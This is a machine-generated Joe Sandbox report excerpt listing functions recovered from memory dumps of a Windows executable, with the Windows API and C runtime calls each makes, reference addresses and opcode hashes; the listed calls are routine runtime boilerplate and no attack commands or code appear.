                                                                                                                                                                                            • Opcode ID: ef6ec7b7b76acf09282e5ebacfaf9a85655b84a2a5a34c5606db226ff2d1a4cd
                                                                                                                                                                                            • Instruction ID: d259d71634b976b736783cd680c346b4ee3e66a8a4e6b2aebd759af3e0aa2ece
                                                                                                                                                                                            • Opcode Fuzzy Hash: ef6ec7b7b76acf09282e5ebacfaf9a85655b84a2a5a34c5606db226ff2d1a4cd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7751F0B59083519BC700EF24EC84B2EBBE9FFE9304F154A2DF48997251E73499948B52
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093384A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                            • Opcode ID: 4a83cf956dbf32c45d10f493f2cd78177b68215d80d30d6d3da39033ac4d63d1
                                                                                                                                                                                            • Instruction ID: 651e167da827b3fc9eb30a81eed8b395389eaf68c2b38b6bd79ecec8d891141d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a83cf956dbf32c45d10f493f2cd78177b68215d80d30d6d3da39033ac4d63d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A71E5B594516CAFDF20AF38DC9DBAAB7B9AF45300F1481D9E04997211DA354F849F10
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0092502C
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 009250F8
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00925111
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0092511B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: 29042140781a03f73349fc4888533ebd01070d335c571572a8be689eaafd2050
                                                                                                                                                                                            • Instruction ID: 8422a7f47b27418a10ad4de0be9fb985180ab1abc83aff6c823e4b4fe57b835d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29042140781a03f73349fc4888533ebd01070d335c571572a8be689eaafd2050
                                                                                                                                                                                            • Instruction Fuzzy Hash: 11310A75D452289BDF20EFA4DD49BCDBBB8AF48304F1041AAE40DAB250EB719B858F45
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CryptContextAddRef.ADVAPI32(00000000,00000000,00000000), ref: 009212C7
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ContextCrypt
                                                                                                                                                                                            • String ID: [+]
                                                                                                                                                                                            • API String ID: 3075001677-4228040803
                                                                                                                                                                                            • Opcode ID: 2a9e55c548933d6f45b8950f2d44555470c28d0358fac2ed3b5da837e715090e
                                                                                                                                                                                            • Instruction ID: 1b2dcae93dd94c63b829bd01fb980b0362fe1cb9cba6df4039d22f664e3cc5b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a9e55c548933d6f45b8950f2d44555470c28d0358fac2ed3b5da837e715090e
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB31273150C3D04BD726AB3478997EBBBD4ABFE318F18097DD8D987247C1605445C762
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0093A20D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0093A2C8
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0093A383
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0093A412
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A45D
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A463
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A499
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A49F
                                                                                                                                                                                            • __freea.LIBCMT ref: 0093A4AF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 127012223-0
                                                                                                                                                                                            • Opcode ID: 5f83bc0f53d57fcc86f48d0e5909304c48bf357c4f1c668e36551e4bc0178880
                                                                                                                                                                                            • Instruction ID: 7152f7c7b501a3836365ab49f903e73a401d7c1952f4c58c1c68d0220515a704
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f83bc0f53d57fcc86f48d0e5909304c48bf357c4f1c668e36551e4bc0178880
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3371F732900215AFDF219E949C89FAF7BBE9F85310F254459F985A72A1E679CC008F62
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0092550C
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00925538
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00925577
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00925594
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009255D3
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 009255F0
                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00925632
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00925655
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                            • Opcode ID: 7d4b16e6ff2d82756cb418cacf19bd87e0f0d765dc81435f21d223e27088e8d3
                                                                                                                                                                                            • Instruction ID: d7047ee128fc266b84a9e600cdac1751865ffd2f120892c72041067a1f31a0fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d4b16e6ff2d82756cb418cacf19bd87e0f0d765dc81435f21d223e27088e8d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: FB51DE72610626AFEF209F60EC45FBA7BA9EF40740F568429F904E61A8DB34CD108B90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00926217
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0092621F
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009262A8
                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 009262D3
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00926328
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                            • Opcode ID: 51bcf3f14f019040b073ce2b0483e90a0be16c1320a560582de7baa0632c6f6f
                                                                                                                                                                                            • Instruction ID: a6193c6514cd2bcd977df02a5eb579202aaf075d288f7a465a8427e400f57dae
                                                                                                                                                                                            • Opcode Fuzzy Hash: 51bcf3f14f019040b073ce2b0483e90a0be16c1320a560582de7baa0632c6f6f
                                                                                                                                                                                            • Instruction Fuzzy Hash: DE41D534A00228DFCF11DF68E880B9E7BB5EF85328F148555E8249B79AC731EE01CB91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,0092F578,0092186A,?,00000000,009231E1,0092186C,?,0092F1F6,00000022,FlsSetValue,0093DFE0,0093DFE8,009231E1), ref: 0092F52A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                            • Opcode ID: 6d826bd3b3e10fd07202885d0c946d95782264c28e941a36635367c87c88a28c
                                                                                                                                                                                            • Instruction ID: c890f8567bcfbb475098310bb0254c27f5e3cd43160c566cafbae061088b29db
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d826bd3b3e10fd07202885d0c946d95782264c28e941a36635367c87c88a28c
                                                                                                                                                                                            • Instruction Fuzzy Hash: A421F376A12221ABCB219F25FC54E6B777C9F42764B204234FD06A72A4E770EE00DAD0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 91c0108c223e7cf6a9b7e5ca91c5627ece5c940b8221e03f486f03e2206567c8
                                                                                                                                                                                            • Instruction ID: 789609da0d41b6b10d2b5273ed1d31fa225b9997b241759087fe024e672cd881
                                                                                                                                                                                            • Opcode Fuzzy Hash: 91c0108c223e7cf6a9b7e5ca91c5627ece5c940b8221e03f486f03e2206567c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 74B133B5E04354BFDB11DFA8E880BAE7BB5AF86310F1481A9F9019B296C7709941CF61
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0092D2B7,00925FB7,00925179), ref: 0092D2CE
                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0092D2DC
                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0092D2F5
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,0092D2B7,00925FB7,00925179), ref: 0092D347
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                            • Opcode ID: ed022a8115f9a7322f8ca3b25cd5e08c568399ec8000fab8eeede86406239ec6
                                                                                                                                                                                            • Instruction ID: 9c397db88ebc1f1279e211d1e012a3c124d300f528b93e2b42c480449ef53576
                                                                                                                                                                                            • Opcode Fuzzy Hash: ed022a8115f9a7322f8ca3b25cd5e08c568399ec8000fab8eeede86406239ec6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4201F73621F732AFA6356BF5BCC5E6B6688EF427B97600329F120650F5EF114C04A6C1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0092DCA7
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0092DF20
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 2673424686-393685449
                                                                                                                                                                                            • Opcode ID: a3e077243eaa76f1e16b92495bcb27a7eda49e487b66eaac9e598f572651e32c
                                                                                                                                                                                            • Instruction ID: aaf41f59c49b8a2e5648ef18f24f81b9735d9469634850e3ec443c5197ff46a7
                                                                                                                                                                                            • Opcode Fuzzy Hash: a3e077243eaa76f1e16b92495bcb27a7eda49e487b66eaac9e598f572651e32c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DB1BF71802229EFCF24EFA4E881AAEB7B9FF55310F154059F8116B25AD370EA51CF91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0093B774,000000FF,?,00928D16,00928BFD,?,00928DB2,00000000), ref: 00928C8A
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,0093B774,000000FF,?,00928D16,00928BFD,?,00928DB2,00000000), ref: 00928C9C
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,0093B774,000000FF,?,00928D16,00928BFD,?,00928DB2,00000000), ref: 00928CBE
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 8c0c750092f2bbdb9e216043416a8f6f700ceff420f6544d4f2118d06b770439
                                                                                                                                                                                            • Instruction ID: 2089c62bbb99d9690dcefc6a2ff8c941ef3455c51cd4bbdae27d4dbb915f4acf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c0c750092f2bbdb9e216043416a8f6f700ceff420f6544d4f2118d06b770439
                                                                                                                                                                                            • Instruction Fuzzy Hash: BF01DB35915625EFCB11CF60DC09FAEB7BCFB45B14F008525F812A22D0DB749900CA90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0092FCC2
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0092FD8B
                                                                                                                                                                                            • __freea.LIBCMT ref: 0092FDF2
                                                                                                                                                                                              • Part of subcall function 0092E531: HeapAlloc.KERNEL32(00000000,009231E1,0092186A,?,009260C1,0092186C,0092186A,?,?,?,00923181,009231E1,0092186E,0092186A,0092186A,0092186A), ref: 0092E563
                                                                                                                                                                                            • __freea.LIBCMT ref: 0092FE05
                                                                                                                                                                                            • __freea.LIBCMT ref: 0092FE12
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                                                                            • Opcode ID: 0325b830e6b893c931d02d4199ed49b633ea37a3888e4f3a5e82a58fade961e8
                                                                                                                                                                                            • Instruction ID: 443de7f763eac212baa14a78e639a3aea029d2c0a0da6cc9e69bce0999ceb3e8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0325b830e6b893c931d02d4199ed49b633ea37a3888e4f3a5e82a58fade961e8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3651B672501226ABEF219F61EC91EBB76BDEF84710B16053DFD04E6169EB34CC5086A0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00923017
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00923022
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00923090
                                                                                                                                                                                              • Part of subcall function 00922EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00922EFC
                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 0092303D
                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 00923053
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000A.00000002.2143453431.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143427973.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143497451.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143554074.0000000000945000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143573511.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143594655.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 0000000A.00000002.2143625595.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                            • Opcode ID: 1b5d1bb02c481d616cbf3a8f7bd76ff227b8ffd1e1d3881294704ecccd3dcd32
